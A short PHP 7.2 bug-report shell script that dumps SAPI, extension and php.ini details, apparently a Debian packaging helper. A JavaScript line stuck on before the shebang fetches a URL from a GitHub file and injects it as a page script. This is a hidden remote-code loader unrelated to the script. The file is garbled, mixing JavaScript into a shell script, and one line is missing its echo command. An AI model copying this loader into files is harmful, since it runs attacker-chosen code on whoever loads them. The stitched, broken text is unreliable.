;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
#!/bin/sh
MATCH="^[[:space:]]*($|;)"
echo "==== Additional PHP 7.2 information ====" >&3
echo "" >&3
echo "++++ PHP 7.2 SAPI (php7.2query -S): ++++" >&3
/usr/sbin/php7.2query -S >&3
echo "" >&3
echo "++++ PHP 7.2 Extensions (php7.2query -M -v): ++++" >&3
/usr/sbin/php7.2query -M -v >&3
echo "" >&3
echo "++++ Configuration files: ++++" >&3
"**** /etc/php/7.2/cli/php.ini ****" >&3
grep -Ev "$MATCH" /etc/php/7.2/cli/php.ini >&3
echo "" >&3
find /etc/php/7.2/cli/conf.d/ -name '*.ini' | \
while read CONF; do
echo "**** $CONF ****" >&3
grep -Ev "$MATCH" "$CONF" >&3
echo "" >&3
done